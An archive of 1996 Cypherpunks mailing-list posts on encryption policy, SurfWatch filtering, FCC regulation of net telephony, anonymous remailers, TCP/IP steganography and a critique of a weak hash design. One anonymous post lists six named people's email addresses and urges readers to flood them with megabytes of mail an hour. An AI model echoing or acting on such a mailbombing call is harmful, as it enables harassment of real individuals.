>to use strong, public-key encryption.  Yes, the same encryption methods
>that American law enforcement is so uptight about.  The same encryption
>that Canadian cops want to avoid, so they can continue to eavesdrop.
>
>It's summarized in a recent Ottawa Citizen article:
>
>        gopher://insight.mcmaster.ca/00/org/efc/media/citizen.13feb96
>
>You may recall the Canadian Association of Chiefs of Police (CACP)
>have voiced their opposition to any encryption of communications unless
>police had access to a "backdoor" last summer.
>
>        gopher://insight.mcmaster.ca/00/org/efc/law/cacp.24aug95
>
>In Canada, it looks like the right to privacy of telecommunications
>might take precedence over the police interest in snooping to catch
>criminals.


I won't repost the entire article here, but here are some highlights:

  - The system is initially intended to secure email between federal
    government employees.  Deployment is expected to begin next year.

  - Key management is decentralized; each department hands out its own keys.

  - Top-secret messages will be encoded using "palm-sized computer cards"
    (presumably some kind of PCMCIA device).

  - The Communications Security Establishment (~= NSA) helped to design
    the system, and claims that it's "more sophisticated than existing
    public versions".

    (This is the part that still worries me a bit, even though EFC's
    David Jones is quoted as saying that he has no concerns.  Will the
    algorithms be published?  Also, why develop a new, untested system --
    why not just buy the thing from RSA, Viacrypt, etc.?  Stay tuned...)

  - There's a great quote from Bob Little, deputy secretary of financial
    and information management for the Treasury Board:  "[The CSE] don't
    have access to the keys . . . and never will.  We did it to avoid
    the American experience with the Clipper Chip."

  - The RCMP (~= FBI) is not amused.


All in all, it sounds like a positive development for once.

--
Martin Janzen           janzen@idacom.hp.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Fri, 8 Mar 1996 13:23:45 +0800
To: cypherpunks@toad.com
Subject: Not a good idea...
Message-ID: <ad64cd0400021004b12d@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 10:35 PM 3/7/96, owner-cypherpunks@toad.com wrote:

>I wonder whether they've actually considered the liability situation
>in re: blocking sites that shouldn't be blocked?    I mean, sure, they
>seem nice enough about setting things right (like with the Nynex sites
>whose url's had "xxx" in the paths), but it seems to this non-lawyer
>that a case could be made for damages inflicted by being known as a
>purveyor of filthy indecency for even a short while.

We need to be very careful here. A service like "SurfWatch," voluntarily
used by others, has entered into no contracts with sites to meet defined
standards of what should and shouldn't be blocked. It is essentially a
"review" service, like a reviewer of books, movies, restaurants, etc. Sure,
some books, movies, and restaurants are "hurt" by negative reviews, but
this is life in a free society. It has not yet reached the point in these
Beknighted States that a bad review can be the basis of a tort (though I
could be wrong...nothing would surprise me these days).

Let me use myself as an example. "TimWatch" offers to inform people of
sites he thinks are not desirable for them to visit. I freely admit that my
criteria are imperfect, and people can choose to follow my advice or not
follow my advice. I may even sell a software package ("TimWatch") to let
users screen sites at their own machines.

Now, do we as Cypherpunks really think TimWatch or SurfWatch should be
liable for "damages" because someone got their feelings hurt? Absent a
contract, spelling out the performance expected, of course not.

If SurfWatch can be sued for a "bad review," then Siskel and Ebert had
better find a new line of work.

--Tim May

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^756839 - 1  | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous-remailer@shell.portal.com
Date: Mon, 11 Mar 1996 03:01:11 +0800
To: cypherpunks@toad.com
Subject: ANTI-CRYPTO CYPHERPUNKS
Message-ID: <199603080305.TAA03009@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


This is the first in a regular series of postings of cypherpunks
who have joined big brothers fight to deprive you from Unescrowed
Crypto. Some of these pigs have come out in favor of the new anticrypto
bill which makes it a crime to use crypto if big bro can't read it
and also sets up key escrow but others have just said that they
don't care if the government can read YOUR mail as long as they get
what they want.

A few megabytes an hour of email from real cypherpunks/patriots
should help these guys see the errors of their way when they give away
your rights.

B. Schneier: bs208@newton.cam.ac.uk, schneier@counterpane.com
M. Blaze: mab@crypto.com, mab@research.att.com
J. Bizdos: jim@rsa.com
S. Safaddar: shabbir@vtw.org
D. Weinstein: djw@vplus.com
P.. Peterson: padgett@hobbes.orl.mmc.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Deranged Mutant" <WlkngOwl@UNiX.asb.com>
Date: Fri, 8 Mar 1996 12:29:45 +0800
To: jim bell <jimbell@pacifier.com>
Subject: Re: Another Motivation for the CDA
Message-ID: <199603080011.TAA13347@UNiX.asb.com>
MIME-Version: 1.0
Content-Type: text/plain


Note: This post is 100% free of crypto and conspiracy theories.


My response to Tim:
> >I think you're reading too much into motives, Tim.  I don't think that
> >most in congress are capable of thinking that elaborately, and besides,
> >if someone is convicted of violating the CDA for saying "fuck" online,
> >that is the type of felony that one can get a judge's waiver for...

Jim Bell's response to mine:

> I am NOT relieved at hearing this.  If one must have a "judge's waiver," 
> then that means he probably can "request" whatever other conditions he 
> chooses to put on his waiver.  The government still has a motivation to make 

Yes and no. Depends on the judge.  Some are hard-assed about granting 
waivers, others aren't.  Part of the problerm is that judges have too 
much discretion.  Another is in the constitution, w/regards to right 
to vote (it can be denied to felons... I know a couple of people 
convicted of DWIs that can no longer vote... they just don't care 
enough to go to a judge and get a waiver.)

Not that you would want to put faith in getting a waiver.  I'm just 
critical of Tim's assertion/speculation that gun-control is related 
to voting for the CDA.



 
Rob. 

---
Send a blank message with the subject "send pgp-key" (not in
quotes) to <WlkngOwl@unix.asb.com> for a copy of my PGP key.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: owner-cypherpunks@toad.com
Date: Fri, 8 Mar 1996 08:27:54 +0800
Subject: No Subject
Message-ID: <QQagbo04642.199603080009@relay3.UU.NET>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

At 01:06 PM 3/7/96 -0500, A. Padgett Peterson P.E. Information Security wrote:
>Do not agree with you. Do support your right to disagree though.
>						 P.fla

That's all this guy said.

Here's my more verbose response.

>Do not agree with you.

You are _entitled_ to not "agree" with me.  What you are NOT entitled to, 
however, is to have a government that violates my rights by attempting to 
restrict crypto and other freedoms, even if it is with the support of 51% of 
the Congress or 51% of the voters or 51% of the population.  (or even 
substantially more.)  If you actively 
support such a government, or even encourage such a government, you are 
doing what is analogous to "inciting a riot":  You are guilty of inciting 
the government to take improper, illegal, unconstitutional, or simply 
immoral actions against me and others, and in my opinion if such actions are 
taken you enter into that conspiracy.

You may be alarmed that I might consider you a criminal for just exercising 
your "free speech."  (If you're not alarmed, you SHOULD be!)  I myself would 
greatly prefer to live in a society where speech was totally free:  There 
would be no laws against libel and slander, and you could "yell 'fire' in a 
crowded theatre" without the possibility of prosecution.  (All the other 
potential customers will be home watching on tape rental, which will make 
what you can do in a theatre less significant.)

But until we live in such a world, I consider that yelling "child porn!" or 
"terrorism!" or "drug smuggling" in "a crowded Congress" or _to_ "a crowded 
Congress" that's anxious to restrict our rights ever further, is an 
incitement to violate my rights.

> Do support your right to disagree though.

No, I don't think you do.  You've done NOTHING to actually _support_ my 
right to disagree, except possibly waste a few bytes of information space on 
a message that you did not see fit to publicize.  (I did, however.)  
Clearly, your "support" for my "right to disagree" is essentially non-existent.

Jim Bell

Klaatu Burada Nikto!




-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMT866/qHVDBboB2dAQHqfAP9F1vYWiHVT67QXNXwuDWpR9n6THRL4S2W
vJq256khHXs4pMawUiGitkovVEDSBM8Tc6t6NpgNbwEojZ40dF147gqq7iTLOrf0
TU4RrUvBKiRJbTXnJM6YdHL7gOHQtU5TqHRft3R9JAHR5zEpetUSIo7+uVbklqqd
Du1cZlTbu68=
=M+dV
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: JonWienke@aol.com
Date: Fri, 8 Mar 1996 12:45:58 +0800
To: Cypherpunks@toad.com
Subject: Re: TCP/IP Stego (was CU-SeeMe)
Message-ID: <960307191318_240274129@mail04.mail.aol.com>
MIME-Version: 1.0
Content-Type: text/plain


>A tcp header contains quite a bit of useful information.. but most of it 
>wouldnt be easily manipulated (by me) to get a bit. You cant very well 
>alternate the port number you are using, or change the packet sequence 
>numbers. However, the tcp protocol forces each tcp header to contain a 
>'checksum' field.. which is (more or less) the sum of all the octets in 
>the packet. This is used as error correction for the protocol. It 
>shouldn't be too difficult to force TCP to fiddle with the data in the 
>packet a bit to force the checksum to be a particular sort of thing (i.e. 
>even or odd number) .. 0 for even and 1 for odd would get us our one 
>bit of data per packet. 

This is a bad idea, because in addition to the extra processor overhead, it
is an incredible waste of bandwidth.  For a 512 byte packet, you are only
getting .02% efficiency, because you wouldn't be able to use the actual data
in the packet; otherwise someone would probably notice the increased error
rate if you dink around with the checksum.  This does not provide adequate
plausible deniability.  Stegoing a 16 bit WAV file gives you 50% efficiency,
(you can replace the 8 least significant bits with stego data and still keep
10 bits worth of sound quality) and someone else would be unable to prove
there was any encrypted info in it if you did it right.

Jonathan Wienke




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: owner-cypherpunks@toad.com
Date: Fri, 8 Mar 1996 11:09:04 +0800
Subject: No Subject
Message-ID: <QQagbq07866.199603080034@relay3.UU.NET>
MIME-Version: 1.0
Content-Type: text/plain




>  In a statement from Washington, the America's Carriers Telecommunication
>Association says it "submits that it is incumbent upon the FCC to exercise
>jurisdiction over the use of the Internet for unregulated interstate and
>international telecommunications services."
>  "For example," adds the ACTA statement, "online service providers generally
>charge users around $10 for five hours of access and then around $3 for each
>additional hour. Five hours equals 300 minutes, divided by $10 is 3.3
>cents per
>minute. The average residential long distance telephone call costs about 22
>cents per minute or seven times as much."

It seems that once again, big business is trying to get in the way of
progress and competition because they are afriad they are going to lose
some money.  It seems to me that the ACTA is upset because someone found a
way to "do it cheaper" and the telco's stand to lose a lot of long distance
dollars.  So rather then using this technology and perhaps lowering LD
rates, instead they seek to block out the technology from the public.  I
wonder what would happen if someone discovered an drastically cheaper
alternative to gasoline, but it never made it main stream because the oil
companies would go out of business.  Seems like the same type of situation
with the telco's.

>  Says ACTA, "Technology may once again be surpassing government's ability to
>control its proper use. However, the misuse of the Internet as a way to
>'by-pass' the traditional means of obtaining long distance service could
>result in a significant reduction of the Internet's ability to transport
>its ever
>enlarging amount of data traffic."

No, the technology is surpassing the telco's ability to provide low-cost
communications.

>  Specifically, ACTA petitions the FCC to define the type of permissible
>communications that may be effected over the Internet.

Permissible communications?  This sounds like something out of the CDA ...
I say, just try and regulate it. I want to see the FCC try and monitor
several million computer transmissions every day and see how well
regulation works.


Thomas J. Sawyer
sawyer@nextek.com






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: owner-cypherpunks@toad.com
Date: Fri, 8 Mar 1996 09:10:26 +0800
Subject: No Subject
Message-ID: <QQagbr09478.199603080046@relay3.UU.NET>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 7 Mar 1996, Duncan Frissell wrote:

> However, a CA operating outside the licensing structure of current CA's
> would have very low costs and hence no investment to lose in litigation.
> Costs would be almost entirely marketing related and as long as you stayed
> out of jurisdictions with some of the new CA law, no regulatory costs or
> barriers.
> 

I don't think this is definitional.  If nothing else they can take the 
equipment.  If you don't incorporate, your personal assets are at risk; 
if you do, you have to keep a real separation between the corporation and 
yourself, pay the taxes, etc.  Ok, make it a non-profit labor of love; 
low risks, no returns, then maybe you are right.  Just hope that there ar 
no punitive or large consequential damages, and no one pierces the 
corporate veil (unlikely, I admit, but not impossible).

What law applies to a certificate used in a multi-jurisdictional
transaction is less obvious to me than I would like.  I think I have
talked a student in my seminar into writing a paper to educate me. 

[The above may have been dictated with Dragon Dictate/Win 2.0 voice 
recognition. Be alert for unintentional strange word substitutions.]

A. Michael Froomkin        | +1 (305) 284-4285; +1 (305) 284-6506 (fax)
Associate Professor of Law | 
U. Miami School of Law     | froomkin@law.miami.edu
P.O. Box 248087            | http://www.law.miami.edu/~froomkin
Coral Gables, FL 33124 USA | It's warm here.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mutant Rob <wlkngowl@unix.asb.com>
Date: Fri, 8 Mar 1996 19:27:22 +0800
To: cypherpunks@toad.com
Subject: Re: Fractals, Cellular Automata, and Encryption
Message-ID: <199603080056.TAA23869@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Interesting point. I've dabbled with CA a little bit, though not in terms
of crypto.  I think at best CA can be used for stream ciphers... and
a big problem is that people assume it's a totally new form of computing,
when in fact it's only a different form, and anything that can be done
with a conventional formula-based scheme can be done with CA and visa-
versa... the pitfall is that one can get all caught up in how chaotic CA
behaves and lose sight that the same thing can be done in a formula, and
that possibly it can be easily broken.

Fractals are interesting. I've thought about using the Julia-set
iterations as a form of crypto (or for that matter, recursive methods
in general)... maybe a kind of block cipher that works with complex
numbers, but using the words as fractions rather than whole numbers.
Perhaps using 64-bit binary fractions, and iterating X = X^2 + C, where
the iteration count and C are keys... using the result as a kind of
stream cipher.  Problem is it would be slow on most machines.

I've also thought about genetic algorithms.  An interesting ideal would
be a genetic algorithm that operated on plaintext, key, ciphertext but
would be self-analyzing and evolve itself in ways to make cryptanalysis
difficult.

- --Rob
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBMT+FpSoZzwIn1bdtAQHg9QF+OhSfJi0WIPB1Lqg5ne7f8mYYvow7yl5k
0gJh0KHaCEJZUcwhmRZ1uWlDlExcx+Q/
=sgLv
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jrochkin@cs.oberlin.edu (Jonathan Rochkind)
Date: Fri, 8 Mar 1996 19:26:57 +0800
To: cypherpunks@toad.com
Subject: Re: Anonymous remailers and Leahy bill
Message-ID: <ad64f086020210041112@[132.162.233.188]>
MIME-Version: 1.0
Content-Type: text/plain


At 5:22 PM 03/07/96, jim bell wrote:
>Wouldn't help "Bob" in the least.  And you didn't read what I wrote very
>carefully, either:  Notice that I said, "under a different name."  In other
>words, the source of the note does not identify the user name under which
>the illegal activity is promised to occur.  Cancelling this particular
>fellow's account does NOTHING to prevent the illegal activity from
>occurring by other, unidentified users, and "Bob" knows it.

How is this differnet then me calling up AOL and saying "Using a friend's
account whose password I have, I'm going to send child pornography out to
many people sometime tommorow"?

I don't know if it is or not, but hopefully it's the same.  As long as
anonymous remailers are legally identical to ISPs, I think we don't have to
worry too much becuase ISPs are now serious money-making businesses with
lots to spend on lobbying and legal fees, and will fight any laws that
effect them such.   Whether this Leahy bill is passed or not, clearly AOL
is not going to quietly shut down their entire company after receiving such
a phone call.  And they can't really do anything to stop the theoretical
next-day child porn mailing either.  [If you like, have the phone caller
threaten to send out encrypted child porn, just to make it more perfect an
example.]

So it would be beneficial to present anonymous remailers as just another
sort of internet service provider.  And we only really have to worry when
there are laws that seem to apply to anon remailers but not AOL.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: owner-cypherpunks@toad.com
Date: Fri, 8 Mar 1996 09:44:53 +0800
Subject: No Subject
Message-ID: <QQagbs12544.199603080110@relay3.UU.NET>
MIME-Version: 1.0
Content-Type: text/plain



Well, it turns out  that (according to a nice  person at SurfWatch who
put up with the rant    I mailed in   and send  back a denial   rather
quickly) io.com isn't  actually blocked.  At least, so  they say.   No
comment on whether there's anything like the "25 complaints" policy.

I don't own SurfWatch, but if anybody does and finds www.io.com
blocked, I'll send in another rant.

I wonder whether they've actually considered the liability situation
in re: blocking sites that shouldn't be blocked?    I mean, sure, they
seem nice enough about setting things right (like with the Nynex sites
whose url's had "xxx" in the paths), but it seems to this non-lawyer
that a case could be made for damages inflicted by being known as a
purveyor of filthy indecency for even a short while.

______c_____________________________________________________________________
Mike M Nally * Tiv^H^H^H IBM * Austin TX    * pain is inevitable  
       m5@tivoli.com * m101@io.com          *
      <URL:http://www.io.com/~m101>         * suffering is optional




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: owner-cypherpunks@toad.com
Date: Fri, 8 Mar 1996 09:47:35 +0800
Subject: No Subject
Message-ID: <QQagbt14381.199603080124@relay3.UU.NET>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

someone wrote:

>[homepage on IO]
>
>BTW, did you hear that IO got on the SurfWatch "bad list" because there
>were more than 25 complaints about objectionable material in the io.com
>domain.  (Apparently, when SurfWatch hears more than 25 complaints
>against a particular domain, the just deny access to the whole domain
>rather than particular URLs.)

A quick phone call to the Surf Watch people revealed that they rarely 
block whole domains, and that they are not currently blocking all of 
io.com. 

- -- 

mutant@compuville.com		"They that can give up essential liberty to
mutant@cypher.net		 obtain a little temporary safety deserve
(send mail with Subject:	 neither liberty nor safety."
 send-pgp-key for PGP key) 	  	        -Ben Franklin  ~1784

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMT9NaH0ndmRPxibdAQFSJwQAtq/s1c+GZlHvgVOhNgM8Dseq0SQ+6L8U
bx8FV0l85anNk+fjRnY5hD8RflHFeVzLis2yDmn8BLjYzVnHBEWBXXncpwg3okoQ
FOMJJTZZbOec10ESy3pvRPwgie60IaR3qIcHUmUHRqbv5dOjgDg5GhYWeZ8rhCCN
0pisfaQBsVc=
=qgSw
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: lmccarth@cs.umass.edu
Date: Mon, 11 Mar 1996 03:01:39 +0800
To: olcay@libtech.com (Olcay Cirit)
Subject: Re: Request Comments: Transpose/XOR Hash
In-Reply-To: <199603040416.XAA23922@bb.hks.net>
Message-ID: <199603080211.VAA05994@thor.cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Olcay Cirit writes:
> I'd like to know if anyone has comments regarding the hash
> method I came up with. 

My primary suggestion is that you do some reading in a good crypto text like
Applied Cryptography (2nd ed.). The introduction to PRZ's manual for PGP is
also particularly germane, as is the sci.crypt FAQ.

> It is a combination of Transposition
> and XORing. Basically, it works like this:
> 
> Let's say K is the 8 character key that will be hashed. 
> There are two binary accumulators M and L, which store the
> Most and Least significant bits in each byte of K. After M and
> L are both 8 bits long, they are XORed together and the 
> resulting value replaces byte N in the Key. This is repeated
> 8 times, and each time, N is incremented by one.

OK, since I'm procrastinating doing some non-crypto work right now, I looked
at your algorithm for 10 minutes or so. Your description is rather vague, so
I'm not sure I understand exactly what you're proposing. My best guess is:

The hash has 8 rounds. The initial 64-bit digest value is H = K. For 
notational convenience, let H[i] denote the i-th byte of H, and H[i,j] denote 
the j-th bit of H[i]. Juxtaposition denotes concatenation. I'll assume bit 1 
is the MSB. You hash K by doing:

H = K
for k = 1 to 8 do
	M = H[1,1] H[2,1] ... H[8,1]
	L = H[1,8] H[2,8] ... H[8,8]
	H[k] = M xor L
od
return H

First of all, this isn't even a good checksum, since the output depends on 
only 16 of the 64 input bits (namely the MSBs and LSBs of each byte of K).

Many pairs of output bits are highly correlated (in fact, equal).
H[2,1] == H[3,1] == ... == H[8,1] because H[1] doesn't change after the first 
round. Similarly H[1,8] == H[2,8] == ... == H[8,8] because H[8] doesn't
change until the end of the algorithm. For each other choice of bit index j, 
there's a "before" value H[1,j] == ... == H[j,j] and an "after" value
H[j+1,j] == ... == H[8,j].

This tells us that there are at most 2^(1 + 7*2) == 2^15 possible hash output 
values. 

But it would be faster to take advantage of the observation that for each j,
H[1,j] == K[j,1] xor K[j,8]. We guess the 8 LSBs as g_1, g_2, ..., g_8, and
compute the corresponding 8 MSBs as m_j = g_j xor H[1,j], which gives us all
the information we need to compute a hash value.

So we can compute a preimage of an arbitrary hash value with at most 2^8 = 
256 guesses.

In any case, this is an extremely weak cryptographic hash.

Lewis			"...made my own pretty hate machine" (Tori Amos)
lmccarth@cs.umass.edu	http://www.cs.umass.edu/~lmccarth

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMT+XOWf7YYibNzjpAQHSSAQA3iBNxdO/xtWUVK66tw/JsgMnEG6U/KwD
wurB+s8GpMEUHlHAuKpTDeiJJDe1qIPHg7lXoArs7kadgBTcnGVkaoMsLZ5zWStb
yLJ5rMn2M4C1SnlxSkE6DfGXxnjbrAZtI60vwuIAkuPwJRknDyrmY/dTizy4R8GU
Erf/KmTj0uU=
=P1O+
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: lmccarth@cs.umass.edu
Date: Mon, 11 Mar 1996 03:04:23 +0800
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: What's anyone know about Teledyne Electronic Technologies?
In-Reply-To: <Pine.SCO.3.91.960306150942.15297I-100000@grctechs.va.grci.com>
Message-ID: <199603080232.VAA27660@thor.cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


Mark Aldrich writes:
> Teledyne (TET) is out marketing a "new" crypto system as a competitor 
> against DES and what TET calls "linear" cryptosystems. They are claiming 
> a non-linear approach in which (as best I can tell) they are permuting 
> the s-boxes and using 4 bit/16 entry substitution tables.
>
> They are also asserting that these "key generated substitution tables and 
> inter-round permutations" are supported by "nonlinear orthomorphic 
> mappings generated from arbitrary key" (and that this is patented) and 
> "row-complete Latin Squares generated from an arbitrary key" (and that 
> this is also patented).

Lothrop Mittenthal, who is Senior Cryptologist at TET, gave a sparsely-
attended talk about some or all of this stuff at the RSA conference in
January. The title was "Statistically Efficient Inter-round Mixing in Block
Substitution Devices". I came in late and was ill-prepared to evaluate much
of what he was presenting, so I can't offer any useful technical opinion.

Copies of his transparencies are in the RSADSC proceedings, so you might try
to borrow someone's copy, or I suppose someone could scan `em and mail you
a copy. He didn't give an email address AFAIK, but according to the
proceedings his phone is (in the PST zone) (805) 498-3621 ext. 5005

Lots of cypherpunks were wandering around there, so maybe someone else heard
the whole seminar and can comment. (CME ?)

-Lewis		"You've got no secrets to conceal. How does it feel ?" (Dylan)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mccoy@communities.com (Jim McCoy)
Date: Fri, 8 Mar 1996 16:27:46 +0800
To: cypherpunks@toad.com
Subject: Re: TCP/IP Stego (was CU-SeeMe)
Message-ID: <v02140b00ad64feb0d70c@[199.2.22.124]>
MIME-Version: 1.0
Content-Type: text/plain


JonWienke@aol.com writes:
>>A tcp header contains quite a bit of useful information.. but most of it
>>wouldnt be easily manipulated (by me) to get a bit. [header checksum
>>twiddling...]
>
>This is a bad idea, because in addition to the extra processor overhead, it
>is an incredible waste of bandwidth.  For a 512 byte packet, you are only
>getting .02% efficiency, because you wouldn't be able to use the actual data
>in the packet; otherwise someone would probably notice the increased error
>rate if you dink around with the checksum.

I think that the original poster meant twiddling some of the (relatively)
unused fields of the header which most routers and applications do not
care about, the type-of-service field or priority would good place to
start.  This would have no effect on the data in the packet, particularly
if you fiddle at the IP level instead of TCP.  While it is a low
bandwidth comm channel, it has a couple of advantages which you seem to
overlook:

        -It can be applied by two routers which are in the middle
         of the connection.  The two endpoints of the TCP/IP
         connection would not even notice.  For example, if I control
         a router "upstream" of a major connection point and the
         site I wish to communicate with is in a similar position
         then I can run the subliminal channel in a "spread spectrum"
         mode across many connections and the packets can get reset
         to their original settings by the other site. The user
         whose stream we fiddled with does not even know that they
         were used as carrier wave...

        -While the per-packet information rate is low, such a system
         has a _lot_ of packets to work with and a much larger choice
         of endpoints.  Your hypothetical .WAV file may pack more
         information in, but there are a miniscule amount of such files
         moving on the Internet; just by transmitting such a file you
         could be suspect (honestly, how many soundfiles do you think
         you could ship around before people get suspicious...)  By
         hiding the information in the lower layers of TCP/IP you also
         make it less likely to be noticed; unless someone hooks up a
         packet sniffer and filters at the IP level the stream will
         go unnoticed, while a soundfile is an application-level
         communication and much easier to watch.  It is, in effect,
         hiding the channel in the low-order bits of the comm channel
         used to transmit your soundfile...

        -An application encoding method (pictures,soundfiles, etc.)
         also needs a "reason" for being sent.  You can legitimately
         send packets for no reason whatsoever, at least from the users
         perspective (e.g. DNS lookups, ICMP messages, faked fragments,
         etc.)  A packet system also has a constant stream of traffic to
         play with; you could run TCP/IP _on top of such a system_!
         Passing soundfiles and images back and forth would not work
         for interactive communication, it is UUCP at best.

jim







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Mon, 11 Mar 1996 00:18:20 +0800
To: Ernest Hua <hua@chromatic.com>
Subject: Re: FCC and Internet telephones
Message-ID: <199603080547.VAA27453@ix7.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 06:16 PM 3/6/96 -0800, you wrote:
>
>Dost my ears deceive me?  Is this true?
>-------- INCLUDED MESSAGE
>  FCC Asked to Stop Net Phones   

True that some organization is asking the _government_ to
stop their competition?  I'm shocked!  Why, next thing you know
people will be asking the government to restrict imports of small cars,
restrict who can run radio stations, ban the hemp industry, 
tax imported sugar, or limit campaign contributions to non-incumbents.
("Not possible", you say - "that would be Un-American!")

Of course it's true.  Will the FCC do what they want?  Who knows;
it's stupid enough that they just might, but it may end up like the
Craig Shergold O'Hair Memorial Modem Tax with people writing them
crank letters for years after they've decided not to.
#--
#			Thanks;  Bill
# Bill Stewart, stewarts@ix.netcom.com, +1-415-442-2215 pager 408-787-1281
#





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Mon, 11 Mar 1996 00:18:15 +0800
To: Oscar Boykin <boykin@pobox.com>
Subject: Re: crypto ++ where?
Message-ID: <199603080547.VAA27469@ix7.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 01:32 AM 3/7/96 -0500, you wrote:
>How can I obtain crypto++, I seem to have deleted the email I had
reguarding it.

The Cypherpunks mailing list is archived on *.hks.net.  You can read it with
a news reader on nntp.hks.net, or check www.hks.net (which tends to run a
few weeks
behind since it's indexed monthly so the current partial-month isn't indexed
yet.)
#--
#			Thanks;  Bill
# Bill Stewart, stewarts@ix.netcom.com, +1-415-442-2215 pager 408-787-1281
#





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Mon, 11 Mar 1996 00:19:44 +0800
To: cypherpunks@toad.com
Subject: Re: Anonymous remailers and Leahy bill
Message-ID: <m0tuv28-0008xCC@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

At 08:03 PM 3/7/96 -0500, Jonathan Rochkind wrote:
>At 5:22 PM 03/07/96, jim bell wrote:
>>Wouldn't help "Bob" in the least.  And you didn't read what I wrote very
>>carefully, either:  Notice that I said, "under a different name."  In other
>>words, the source of the note does not identify the user name under which
>>the illegal activity is promised to occur.  Cancelling this particular
>>fellow's account does NOTHING to prevent the illegal activity from
>>occurring by other, unidentified users, and "Bob" knows it.
>
>How is this differnet then me calling up AOL and saying "Using a friend's
>account whose password I have, I'm going to send child pornography out to
>many people sometime tommorow"?

It may be similarly illegal, but it's still a bit different.  See below.

>
>I don't know if it is or not, but hopefully it's the same.  As long as
>anonymous remailers are legally identical to ISPs, I think we don't have to
>worry too much becuase ISPs are now serious money-making businesses with
>lots to spend on lobbying and legal fees, and will fight any laws that
>effect them such. 

It is occasionally argued that business doesn't like regulation.  That 
observation is misleading:  It turns out that _big_ business actually 
benefits, at least differentially, from regulation:  If it costs a fixed 
amount to keep a corporation on the right side of the regulation, that's the 
same for a tiny company and a large company, in fixed dollars.  However, as 
a fraction of sales, it can be vastly different.  "Big business" is well 
aware that regulations keep down the competition.  "Big business" wants JUST 
ENOUGH regulation to achieve its ends of reducing competition, but without 
being too expensive for itself.


> Whether this Leahy bill is passed or not, clearly AOL
>is not going to quietly shut down their entire company after receiving such
>a phone call.  And they can't really do anything to stop the theoretical
>next-day child porn mailing either. 

One big advantage that AOL, or for that matter ANY online service has, is 
that its customers (or the customers of a competing big service) will be on 
any jury.  They are familiar with how such an organization operates, and 
they can sympathize a bit with the difficulty of monitoring all this 
material.  They may, in fact, want to KEEP AOL from doing this monitoring, 
and thus they'll cut AOL some slack when it comes to any decision.  
Prosecutors know this, judges know this, etc.  In this case, familiarity 
breeds tolerance.

Encrypted anonymous remailers, however, are more of a shady, fly-by-night 
sort of operation.  The average AOL user may not even have HEARD about them, 
let alone actually used them or depended on their continued existence.  It 
is far less likely that a juror will understand why they exist, and will be 
more likely to think the remailer is responsible for any illegalities 
committed with that service.  Besides, any prosecutor is fully aware that 
AOL has enough money to defend itself fully, and has the ability to generate 
angry publicity from its customers against its harassers.  Essentially by 
definition, an anonymous remailer can't count on anyone stepping forward and 
saying, "I use this encrypted anonymous remailer a lot..."


>So it would be beneficial to present anonymous remailers as just another
>sort of internet service provider.  And we only really have to worry when
>there are laws that seem to apply to anon remailers but not AOL.

On the contrary:  It is the application of any such law which is critical, 
and that can't be accurately gauged until the law is actually passed and it 
is in the hands of prosecutors.  I'm not willing to give them that chance.  
I'm certain they will abuse the law.

But if you doubt their motivations, I recommend that you try to have that 
section removed.  If that section was put there just as a "throwaway," they 
won't squawk.  But I predict they will be extremely reluctant to remove it, 
because that's exactly the portion of the bill they really want.  They don't 
want you to know this, of course.  Please test them.

Jim Bell
jimbell@pacifier.com

Klaatu Burada Nikto

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

